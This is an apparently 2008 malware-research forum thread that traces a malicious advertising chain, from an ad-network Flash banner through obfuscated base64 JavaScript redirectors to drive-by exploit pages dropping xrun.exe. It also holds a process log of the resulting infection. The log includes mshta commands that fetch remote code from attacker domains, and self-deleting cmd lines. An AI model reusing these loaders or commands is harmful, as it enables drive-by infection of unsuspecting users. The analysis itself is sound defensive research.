Help - Search - Members - Calendar
Full Version: Malicious Advertising
B.I.S.S. Forums > Malware Research Forum > Malware Playground
Kimberly
Mar 4 2008, 07:21 PM
xrun.exe was reported to be seen on ebaumworld.com but unfortunately I didn’t get the file while visiting the website. I got curious because usually you get that file on crack sites. After starting up my VM, I headed to a well-known crack site. Surprise surprise, it’s trigged by an advertising banner so you might run into this one on different websites.

We will see later on that xrun.exe isn’t the only exploit. I actually got 3 alerts.
IPB Image
IPB Image
IPB Image
Don’t follow the links in the write-up or you will end up with a ton load of malware on your PC.

<h4>
Tracing back the origin of the file
</h4>
I worked backwards to find back it's origin using the referer headers in the packets but it will be far more comprehensive if we start with the initial advert.

It all begins with a placeholder for ads.clicksor.com adverts.
hxxp://ads.clicksor.com/serving/flash/160x600.swf – Nothing special because it’s simply a black placeholder for random adverts.

IPB Image
Once unpacked, we can take a look at the SWF file with Flare. Inside you can see the following function which displays the random banners:

CODE
function displayBannerAd(cid, kid, nid, pnid, url, cdata, mtype, cpx, adWidth, adHeight, adType, bannerID, pid, sid, ch, uid) {
      if (cid == '-1' && kid == '-1') {
        getURL(url, '_self');
        return undefined;
      } else {
        if ((cpx == 'cpm' || cpx == 'cpa') && mtype == 'rich') {
          getURL('http://ads' + ((pnid != 1) ? pnid : '') + '.clicksor.com/serving/showRichAd.php?cid=' + cid + '&kid=' + kid + '&nid=' + nid + '&mtype=' + mtype + '&cpx=' + cpx + '&adType=' + adType + '&bannerID=' + bannerID + '&pid=' + pid + '&sid=' + sid + '&ch=' + ch + '&uid=' + uid, '_self');
          return undefined;
        } else {
          var container = createEmptyMovieClip('container', getNextHighestDepth());
          var v2 = new MovieClipLoader();
          this.onLoadInit = function (mc) {
            mc.onRelease = function () {
              getURL(url, '_blank');
            };

            container._width = adWidth;
            container._height = adHeight;
          };

          v2.addListener(this);
          v2.loadClip(cdata, container);
        }
      }
    }

showRichAd.php is called with several arguments. They determine the advertisement that needs to be displayed.

CODE
GET /serving/showRichAd.php?cid=46821&kid=3605363&nid=1&mtype=rich&cpx=cpm&adType=5&bannerID=55706&pid=61989&sid=124442&ch=undefined&uid=1024551843 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ads.clicksor.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:33 GMT
Server: Apache/2.2.3 (Fedora)
X-Powered-By: PHP/5.1.6
Set-Cookie: CLICKSORUID=1204643013952; expires=Thu, 03-Apr-2008 15:03:33 GMT; path=/; domain=.clicksor.com
Content-Length: 207
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML><BODY leftmargin=0 topmargin=0><iframe src="http://creative.clicksor.com/46821/c1032706034.html" FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO width="160" height="600"></iframe></BODY></HTML>

CODE
GET /46821/c1032706034.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ads.clicksor.com/serving/showRichAd.php?cid=46821&kid=3605363&nid=1&mtype=rich&cpx=cpm&adType=5&bannerID=55706&pid=61989&sid=124442&ch=undefined&uid=1024551843
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: creative.clicksor.com
Connection: Keep-Alive
Cookie: CLICKSORUID=1204643013952
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:34 GMT
Server: Apache/2.0.54 (Fedora)
Last-Modified: Mon, 25 Sep 2006 14:19:20 GMT
ETag: "df51f1-111-e0362a00"
Accept-Ranges: bytes
Content-Length: 273
Connection: close
Content-Type: text/html; charset=UTF-8
<html><head><title>AD</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head><body topmargin="0" leftmargin="0">
........<script language="javascript" src="http://especialads.com/banner/serve.php?sv=160x600"></script>
........</body></html>

CODE
GET /banner/serve.php?sv=160x600 HTTP/1.1
Accept: */*
Referer: http://creative.clicksor.com/46821/c1032706034.html
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: especialads.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: Mon, 01 Jul 2000 01:00:00 GMT
Pragma: no-cache
P3P: href="http://especialads.com/w3c/p3p.xml", CP="ad policy", policyref="http://especialads.com/w3c/p3p.xml"
Content-Length: 945
Connection: close
Content-Type: text/html; charset=UTF-8
var awefjwefo = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
function waofls(odkqwp) { var bits; var wqodfkpa = ''; var i = 0; for(; i<odkqwp.length; i += 4) { bits = (awefjwefo.indexOf(odkqwp.charAt(i)) & 0xff) <<18 | (awefjwefo.indexOf(odkqwp.charAt(i +1)) & 0xff) <<12 | (awefjwefo.indexOf(odkqwp.charAt(i +2)) & 0xff) << 6 | awefjwefo.indexOf(odkqwp.charAt(i +3)) & 0xff; wqodfkpa += String.fromCharCode((bits & 0xff0000) >>16, (bits & 0xff00) >>8, bits & 0xff); } if(odkqwp.charCodeAt(i -2) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -2)); } else if(odkqwp.charCodeAt(i -1) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -1)); } else {return(wqodfkpa)};}
document.write(waofls(unescape('DQo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4NCmRvY3VtZW50LmxvY2F0aW9uLmhyZWYgPSAiaHR0cDovL2VzcGVjaWFsYWRzLmNvbS9iYW5uZXIvc2hvdy5waHA/Y2lkPTExMzI0MjYmdGlkPTQ1MDExMDEzOTUmc3Y9MTYweDYwMCI7DQo8L3NjcmlwdD4NCg0K')));

Once decrypted, the code above gives us the next location:

CODE
<script language="javascript">
document.location.href = "http://especialads.com/banner/show.php?cid=1132426&tid=4501101395&sv=160x600";
</script>

CODE
GET /banner/show.php?cid=1132426&tid=4501101395&sv=160x600 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ads.clicksor.com/serving/showRichAd.php?cid=46821&kid=3605363&nid=1&mtype=rich&cpx=cpm&adType=5&bannerID=55706&pid=61989&sid=124442&ch=undefined&uid=1024551843
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: especialads.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 04 Mar 2008 15:03:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: Mon, 01 Jul 2000 01:00:00 GMT
Pragma: no-cache
P3P: href="http://especialads.com/w3c/p3p.xml", CP="ad policy", policyref="http://especialads.com/w3c/p3p.xml"
Set-Cookie: ebannsetc=1204643014; expires=Tue, 25-Mar-2008 15:03:34 GMT
Content-Length: 1484
Connection: close
Content-Type: text/html; charset=UTF-8
<script language="javascript">
var awefjwefo = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
function waofls(odkqwp) { var bits; var wqodfkpa = ''; var i = 0; for(; i<odkqwp.length; i += 4) { bits = (awefjwefo.indexOf(odkqwp.charAt(i)) & 0xff) <<18 | (awefjwefo.indexOf(odkqwp.charAt(i +1)) & 0xff) <<12 | (awefjwefo.indexOf(odkqwp.charAt(i +2)) & 0xff) << 6 | awefjwefo.indexOf(odkqwp.charAt(i +3)) & 0xff; wqodfkpa += String.fromCharCode((bits & 0xff0000) >>16, (bits & 0xff00) >>8, bits & 0xff); } if(odkqwp.charCodeAt(i -2) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -2)); } else if(odkqwp.charCodeAt(i -1) == 61) { return(wqodfkpa.substring(0, wqodfkpa.length -1)); } else {return(wqodfkpa)};}
document.write(waofls(unescape('DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPiBib2R5IHsgbWFyZ2luLWxlZnQ6IDBweDsgbWFyZ2luLXRvcDogMHB4OyBtYXJnaW4tcmlnaHQ6IDBweDsgbWFyZ2luLWJvdHRvbTogMHB4OyB9IDwvc3R5bGU+PGJvZHkgc2Nyb2xsPSJubyI+DQoNCjxhIGhyZWY9Imh0dHA6Ly9jbGljay5saW5rc3luZXJneS5jb20vZnMtYmluL2NsaWNrP2lkPU9neGNKMDdHZnEwJm9mZmVyaWQ9MTEyOTYzLjEwMDAwMDA3JnN1YmlkPTAmdHlwZT00IiB0YXJnZXQ9Il9ibGFuayI+PElNRyBib3JkZXI9IjAiIGFsdD0iOHg4LCBJbmMuIiBzcmM9Imh0dHA6Ly9hZC5saW5rc3luZXJneS5jb20vZnMtYmluL3Nob3c/aWQ9T2d4Y0owN0dmcTAmYmlkcz0xMTI5NjMuMTAwMDAwMDcmc3ViaWQ9MCZ0eXBlPTQmZ3JpZG51bT05Ij48L2E+DQoNCg0KDQoNCg0KPHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCIgc3JjPSJodHRwOi8vd3d3LmF3b2Zrd3kubmV0L3BsYWNlaG9sZGVyLTEzNTQ1MDAtMTkyOTA0NDQxOCI+PC9zY3JpcHQ+DQoNCg0KDQoNCg0K')));
</script>

Decoded:

CODE
<style type="text/css"> body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } </style><body scroll="no">
<a href="http://click.linksynergy.com/fs-bin/click?id=OgxcJ07Gfq0&offerid=112963.10000007&subid=0&type=4" target="_blank"><IMG border="0" alt="8x8, Inc." src="http://ad.linksynergy.com/fs-bin/show?id=OgxcJ07Gfq0&bids=112963.10000007&subid=0&type=4&gridnum=9"></a>
<script language="javascript" src="http://www.awofkwy.net/placeholder-1354500-1929044418"></script>

The ad.linksynergy.com link will show us the advert image (see below), but right now we are only interested by the www.awofkwy.net/placeholder-1354500-1929044418 link. From here on I will only post screenshots of the code to avoid trouble.

IPB Image

Decoded:

IPB Image

First iframe ...

IPB Image

There are still encoded parts - see Unescape in the text - they are references to ADOBE.Stream ActiveX controls. The most interesting part are the 2 links to our malware files.

IPB Image

The second iframe ...

IPB Image

The script is rather long, I took only a snipit. We find mshta & srun.php back here. At the bottom again links to xrun.exe and xpre.exe.

IPB Image

Third iframe ...

IPB Image

Java exploit ... the code is very long, so I will only post 2 snipits that show the links.

IPB Image

Advertising image:

IPB Image

<h4>
especialads.com - 83.216.217.242
</h4>
ICANN Registrar: ENOM, INC.
Created: 2006-07-16
Expires: 2008-07-16

Name Server: DNS1.NAME-SERVICES.COM (has 4,321,272 domains)
Name Server: DNS2.NAME-SERVICES.COM
Name Server: DNS3.NAME-SERVICES.COM
Name Server: DNS4.NAME-SERVICES.COM
Name Server: DNS5.NAME-SERVICES.COM
Whois Server: whois.enom.com

Server Type: Apache/2.2.3 (CentOS)
IP Location - Niederosterreich - Baden - Colobase Customer Allocation

Registration Service Provided By: NameAlerts, LLC
Contact:
Visit: http://www.NameAlerts.com

Domain name: especialads.com

Registrant Contact:

Marcel Heler ()
436641774176
Fax: 436641774176
Braeuhausgasse 31/31
Vienna, 1050
AT

Administrative Contact:

Marcel Heler ()
436641774176
Fax: 436641774176
Braeuhausgasse 31/31
Vienna, 1050
AT

Technical Contact:

Marcel Heler ()
436641774176
Fax: 436641774176
Braeuhausgasse 31/31
Vienna, 1050
AT

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

Creation date: 16 Jul 2006 19:39:22
Expiration date: 16 Jul 2008 19:39:22

Websites.
  1. Adoutfer.net
  2. Adpopserve.net
  3. Adpopshow.net
  4. Adpopups.net
  5. Adxanet.net
  6. Adxrnet.net
  7. Awofkwy.net
  8. Especialads.com
  9. Iefjios.net
  10. Kasdfps.net
  11. Kiafjwo.net
  12. Netaddirect.com
  13. Netcrefer.net
  14. Netcshow.net
  15. Netsdir.net
  16. Snipenet.net
  17. Snipernet.biz
  18. Snipernet.us
  19. Sxload.net
  20. Xpseek.net
Kimberly
Mar 6 2008, 11:17 PM
QUOTE(Kimberly @ Mar 4 2008, 08:21 PM) [snapback]86165[/snapback]
Don’t follow the links in the write-up or you will end up with a ton load of malware on your PC.
Speaking of junk .... diablo.gif
QUOTE
---Process Guard Log Started---

Thu 06 - 22:31:59 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xrun.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xrun.exe" ]
Thu 06 - 22:32:19 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:32:20 [TERMINATE] c:\docume~1\kly\locals~1\temp\xpre.exe [288] was blocked from terminating c:\program files\common files\symantec shared\ccapp.exe [428]
Thu 06 - 22:32:20 [TERMINATE] c:\docume~1\kly\locals~1\temp\xpre.exe [288] was blocked from terminating c:\program files\processguard\procguard.exe [872]
Thu 06 - 22:32:57 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\windows\system32\mshta.exe" hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:33:22 [EXECUTION] "c:\windows\system32\dllhost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ c:\windows\system32\dllhost.exe /processid:{02d4b3f1-fd88-11d1-960d-00805fc79235} ]
Thu 06 - 22:33:29 [EXECUTION] "c:\windows\system32\msdtc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ c:\windows\system32\msdtc.exe ]
Thu 06 - 22:33:40 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\windows\system32\mshta.exe" hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:33:44 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\program files\internet explorer\iexplore.exe" [1444]
[EXECUTION] Commandline - [ "c:\windows\system32\mshta.exe" hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:37:53 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\xpre.exe" ]
Thu 06 - 22:38:08 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\snapsnet.exe" ]
Thu 06 - 22:38:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1104]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:38:16 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1280]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" ]
Thu 06 - 22:38:47 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\rasesnet.exe" ]
Thu 06 - 22:38:50 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3728]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:38:57 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3744]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:39:08 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\wavvsnet.exe" ]
Thu 06 - 22:39:12 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3312]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:39:35 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3340]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:39:50 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1916]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:40:15 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xrun.exe" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c start "" "%tmp%\yazzsnet.exe" ]
Thu 06 - 22:40:18 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1484]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:40:22 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [220]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:40:27 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:40:31 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:40:33 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:40:39 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1168]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xrun.exe" >> nul ]
Thu 06 - 22:41:16 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2516]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:41:40 [EXECUTION] "c:\temp\txnog4220.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\idlo01\idlo011065.exe" [2252]
[EXECUTION] Commandline - [ c:\temp\txnog4220.exe ]
Thu 06 - 22:41:43 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:41:47 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3292]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:41:50 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:41:52 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1216]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:41:59 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:42:01 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2816]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:42:03 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3040]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:42:06 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ mshta hxxp://adxanet.net/code/srun.php ]
Thu 06 - 22:43:08 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" [1248]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:43:21 [EXECUTION] "c:\windows\17pholmes572.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [2640]
[EXECUTION] Commandline - [ "c:\windows\17pholmes572.exe" 61a847b5bbf728173599284503996897c881250221c8670836ac4fa7c8833201749139 ]
Thu 06 - 22:44:02 [EXECUTION] "c:\windows\system32\ev4\philcom3.exe" was allowed to run
[EXECUTION] Started by "c:\temp\txnog4220.exe" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\ev4\philcom3.exe ]
Thu 06 - 22:44:07 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2332]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:44:08 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3852]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:44:10 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1104]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:44:11 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1256]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:44:14 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3940]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:44:15 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [2268]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:44:35 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ mshta hxxp://snipenet.net/ads/winfix.php ]
Thu 06 - 22:45:00 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml2.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3320]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml2.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:45:08 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:45:10 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:45:12 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:45:22 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [2640]
[EXECUTION] Commandline - [ cmd /c ""c:\docume~1\kly\locals~1\temp\un.bat" " ]
Thu 06 - 22:45:28 [EXECUTION] "c:\windows\system32\fb3\rvdll36.exe" was allowed to run
[EXECUTION] Started by "c:\temp\txnog4220.exe" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\fb3\rvdll36.exe ]
Thu 06 - 22:45:37 [EXECUTION] "c:\windows\system32\ev4\philcom3.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\ev4\philcom3.exe" [2372]
[EXECUTION] Commandline - [ c:\windows\system32\ev4\philcom3.exe child ]
Thu 06 - 22:45:50 [EXECUTION] "c:\windows\system32\mshta.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ mshta hxxp://snipenet.net/ads/winavp.php ]
Thu 06 - 22:45:57 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml3.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3320]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml3.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:46:09 [EXECUTION] "c:\windows\downloaded program files\uga6p_0001_n122m2802netinstaller.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3452]
[EXECUTION] Commandline - [ "c:\windows\downloaded program files\uga6p_0001_n122m2802netinstaller.exe" /regserver ]
Thu 06 - 22:46:20 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:46:26 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:46:30 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:46:37 [EXECUTION] "c:\windows\system32\ax9\np89104.exe" was allowed to run
[EXECUTION] Started by "c:\temp\txnog4220.exe" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\ax9\np89104.exe ]
Thu 06 - 22:46:40 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [1400]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:46:43 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [3932]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:46:47 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [3308]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
